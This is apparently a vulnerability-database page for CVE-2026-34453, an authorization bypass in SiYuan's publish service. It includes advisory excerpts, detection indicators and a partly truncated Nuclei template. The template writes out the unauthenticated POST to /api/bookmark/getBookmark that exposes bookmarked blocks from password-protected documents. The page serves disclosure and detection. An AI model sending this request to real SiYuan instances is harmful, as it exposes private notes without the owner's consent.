CVE-2026-34453
published 2026-03-31CVE-2026-34453: SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to…
PriorityP258high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
1.23%
65.1th percentile
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| b3log | siyuan | < 3.6.2 | 3.6.2 |
| github.com | siyuan-note_siyuan_kernel | >= 0 < 3.6.2 | 3.6.2 |
| siyuan-note | siyuan | < 3.6.2 | 3.6.2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Unauthenticated POST request to /api/bookmark/getBookmark with an empty JSON body ({}) returns HTTP 200 with 'code':0, 'type':'bookmark', and 'blocks' fields — indicating successful bypass of publish password protection.
- →Response body contains all three strings: '"code":0', '"type":"bookmark"', and '"blocks"' simultaneously, confirming bookmarked blocks from protected documents are exposed.
- →Affected versions are SiYuan <= 3.6.1; presence of a valid version response from /api/system/version can be used to confirm the vulnerable version range before exploitation check.
- →The root cause is FilterBlocksByPublishAccess receiving a nil context, which skips the publish password check and treats the caller as authorized — look for nil context passed to this filter in code review.
- ·Exploitation requires at least one block in a password-protected document to be bookmarked; documents with no bookmarked blocks are not exposed via this endpoint.
- ·The vulnerability is only exploitable when the SiYuan publish/read-only service is exposed; instances not running the publish service are not affected.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
ghsa·2026-03-31
CVE-2026-34453 [HIGH] CWE-863 SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
### Summary
The publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, `/api/bookmark/getBookmark` filters bookmark results by calling `FilterBlocksByPublishAccess(nil, ...)`. Because the filter treats a `nil` context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as `Protected`. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked.
### Details
The issue is caused by an authorization bypass in the bookmark API path
OSV
SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
osv·2026-03-31
CVE-2026-34453 [HIGH] SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
### Summary
The publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, `/api/bookmark/getBookmark` filters bookmark results by calling `FilterBlocksByPublishAccess(nil, ...)`. Because the filter treats a `nil` context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as `Protected`. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked.
### Details
The issue is caused by an authorization bypass in the bookmark API path
No detection rules found.
Nuclei
SiYuan <= v3.6.1 - Bookmark Data Disclosure
nuclei·CVSS 7.5
CVE-2026-34453 [HIGH] SiYuan <= v3.6.1 - Bookmark Data Disclosure
SiYuan = 0.0.1", "<= 3.6.1")'
condition: and
extractors:
- type: json
name: ver
internal: true
json:
- '.data'
- raw:
- |
POST /api/bookmark/getBookmark HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"code":0'
- '"type":"bookmark"'
- '"blocks"'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100c63f02197b02aa3610c5095f509c27cdbbf81b1809470e0d130187d31bc489fd022100df90bab7ee1ee45dc9658cb8987d87cdef4ba9b37ac6184aa9578e828e52725b:922c64590222798bb761d5b6d8e72950
2026-03-31
Published